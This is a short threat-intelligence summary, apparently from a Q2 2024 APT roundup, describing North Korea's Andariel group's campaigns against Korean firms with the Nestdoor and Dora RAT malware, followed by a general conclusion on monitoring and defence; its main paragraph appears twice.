Researchers identified new Andariel APT attack campaigns targeting Korean corporations in Q2 of 2024. These attacks employed a variety of malware tools, including keyloggers, infostealers, and proxy tools alongside backdoors, aimed at gaining control and exfiltrating data from compromised systems. Notably, Nestdoor, a persistent RAT malware, featured prominently in these campaigns, leveraging tactics such as exploiting the Log4Shell vulnerability in VMware Horizon and disguising itself as legitimate software like OpenVPN to maintain persistence through task scheduling and command-and-control (C&C) server communication. Recently, Andariel has also introduced a new malware strain, Dora RAT, developed in Go, supporting basic functionalities like reverse shell and file operations, sometimes signed with valid certificates to evade detection. In addition to direct attacks, the group has been observed using proxy tools akin to those previously linked to Lazarus Group activities, underscoring their sophistication and adaptation of tactics over time.
ANDARIEL
Researchers identified new Andariel APT attack campaigns targeting Korean corporations in Q2 of 2024. These attacks employed a variety of malware tools, including keyloggers, infostealers, and proxy tools alongside backdoors, aimed at gaining control and exfiltrating data from compromised systems. Notably, Nestdoor, a persistent RAT malware, featured prominently in these campaigns, leveraging tactics such as exploiting the Log4Shell vulnerability in VMware Horizon and disguising itself as legitimate software like OpenVPN to maintain persistence through task scheduling and command-and-control (C&C) server communication. Recently, Andariel has also introduced a new malware strain, Dora RAT, developed in Go, supporting basic functionalities like reverse shell and file operations, sometimes signed with valid certificates to evade detection. In addition to direct attacks, the group has been observed using proxy tools akin to those previously linked to Lazarus Group activities, underscoring their sophistication and adaptation of tactics over time.
CONCLUSION
In Q2 2024, the APT landscape showcased intensified efforts by Iranian, Russian, Chinese, and North Korean cyber actors. These groups have demonstrated advanced capabilities and strategic intent across various regions and sectors, emphasizing the critical need for heightened cybersecurity measures. To mitigate these evolving threats, it is imperative for organizations to prioritize continuous monitoring, robust defense mechanisms, and comprehensive user education, ensuring proactive and adaptive responses to protect against the diverse and dynamic landscape of cyber espionage and cybercrime.
Source: Original Post